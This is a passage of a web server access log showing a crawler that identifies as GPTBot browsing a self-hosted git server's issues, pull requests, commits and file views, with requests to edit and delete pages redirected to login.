-[17/Feb/2026:19:00:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" -[17/Feb/2026:19:00:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" -[17/Feb/2026:19:00:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" -[17/Feb/2026:19:00:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" -[17/Feb/2026:19:00:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json?display=source" [Client 74.7.227.38] [Length 13198] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" -[17/Feb/2026:19:00:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json?display=rendered" [Client 74.7.227.38] [Length 11209] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" -[17/Feb/2026:19:00:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 9851] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" -[17/Feb/2026:19:00:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 13026] [Gzip 6.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" -[17/Feb/2026:19:00:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 1916] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" -[17/Feb/2026:19:00:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 977] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" -[17/Feb/2026:19:00:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2f.ninja_log" [Client 74.7.227.38] [Length 25091] [Gzip 4.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_log" -[17/Feb/2026:19:00:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2findustrial-comm%2fcpp%2fsrc%2fcodec.cpp" [Client 74.7.227.38] [Length 29837] [Gzip 8.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/codec.cpp" -[17/Feb/2026:19:00:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fsrc-old%2fold_codec.cpp" [Client 74.7.227.38] [Length 25630] [Gzip 5.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:19:00:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2f.cmake%2fapi" [Client 74.7.227.38] [Length 55598] [Gzip 12.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api" -[17/Feb/2026:19:00:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:00:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:00:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:00:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:00:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" -[17/Feb/2026:19:00:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" -[17/Feb/2026:19:00:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" -[17/Feb/2026:19:00:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" -[17/Feb/2026:19:00:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&sort=leastupdate&state=closed&type=all" -[17/Feb/2026:19:00:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/dist" [Client 74.7.227.38] [Length 9777] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist" -[17/Feb/2026:19:00:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&state=closed&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&state=all&type=all" -[17/Feb/2026:19:00:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11658] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:19:00:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:00:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=open&type=all" -[17/Feb/2026:19:00:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:00:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:19:00:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:19:00:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:19:00:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:19:00:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:19:00:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:19:01:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:19:01:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:19:01:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:19:01:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.2%2fwarn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 27797] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" -[17/Feb/2026:19:01:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.3%2fwarn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 27465] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" -[17/Feb/2026:19:01:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.1%2fwarn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 27778] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" -[17/Feb/2026:19:01:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2flocalpycs" [Client 74.7.227.38] [Length 18881] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:19:01:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:01:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:01:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:01:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:01:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=closed&type=all" -[17/Feb/2026:19:01:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=open&type=all" -[17/Feb/2026:19:01:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:01:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:19:01:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=recentupdate&state=open&type=all" -[17/Feb/2026:19:01:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=nearduedate&state=open&type=all" -[17/Feb/2026:19:01:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastupdate&state=open&type=all" -[17/Feb/2026:19:01:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9977] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=all&type=all" -[17/Feb/2026:19:01:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11319] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:19:01:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:01:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 